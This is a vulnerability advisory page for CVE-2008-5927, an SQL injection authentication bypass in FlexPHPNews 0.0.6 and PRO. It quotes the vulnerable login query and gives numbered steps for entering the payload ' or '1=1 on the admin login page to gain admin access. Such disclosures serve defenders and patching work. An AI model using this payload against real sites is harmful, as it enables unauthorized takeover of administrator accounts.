Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability
2009.01.22
Credit:
Osirys
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-5927
CWE:
CWE-89
CVSS Base Score:
7.5/10
Impact Subscore:
6.4/10
Exploitability Subscore:
10/10
Exploit range:
Remote
Attack complexity:
Low
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
[START] ######################################################################################### [0x01] Informations: Script : FlexPHPNews PRO 0.0.6 Script : FlexPHPNews 0.0.6 Download : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro] Download : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6] Vulnerability : Sql Injection (Auth bypass) Author : Osirys Contact : osirys[at]live[dot]it Notes : Proud to be Italian Greets: : XaDoS, x0r, emgent, Jay, str0ke ######################################################################################### [0x02] Bug:[Sql Injection (Auth bypass)] ###### Bugged file is: /[path]/admin/usercheck.php [CODE] if (!empty($logincheck)){ $sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'"; $results = $db->select($sql); [/CODE] [!] EXPLOIT DETAILS: [1] Go to /[path]/admin/index.php [2] Put as username and password the following sql code: ' or '1=1 [3] You are the admin now, bypass succesfull =) ######################################################################################### [/END]
References:
http://www.securityfocus.com/bid/32810
http://www.milw0rm.com/exploits/7443
http://secunia.com/advisories/33114
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top